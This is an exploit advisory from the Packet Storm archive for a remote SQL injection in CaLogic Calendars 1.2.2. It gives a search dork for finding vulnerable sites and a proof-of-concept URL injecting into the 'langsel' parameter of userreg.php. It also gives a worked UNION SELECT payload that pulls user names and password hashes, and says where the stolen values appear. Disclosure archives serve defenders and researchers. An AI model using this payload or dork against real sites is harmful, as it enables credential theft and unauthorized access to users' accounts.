CaLogic Calendars version 1.2.2 suffers from a remote SQL injection vulnerability.
7d7ff16b4f9dea55cbdd6e202d946739b816eb47d5ef6cd7e7c5aab496e93d4b/---------------------------------------------------------------\
\ /
/ CaLogic Calendars V1.2.2 Remote SQL injection \
\ /
\---------------------------------------------------------------/
[*] Author : His0k4 [ALGERIAN HaCkEr]
[*] Dork : "CaLogic Calendars V1.2.2"
[*] POC : http://localhost/[SCRIPT_PATH]/userreg.php?langsel={SQL}
[*] Example : http://localhost/[SCRIPT_PATH]/userreg.php?langsel=1 and 1=0 UNION SELECT concat(uname,0x3a,pw) FROM clc_user_reg where uid=CHAR(49)--
[*] Note : You can see the results (user name & password) in "SQL String" line for example {SQL String: select * from clc_lang_admin:21232f297a57a5a743894a0e4a801fc3 where keyid='urth'}
----------------------------------------------------------------------------
[*] Greetings : Str0ke, all friends & muslims HaCkeRs...
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed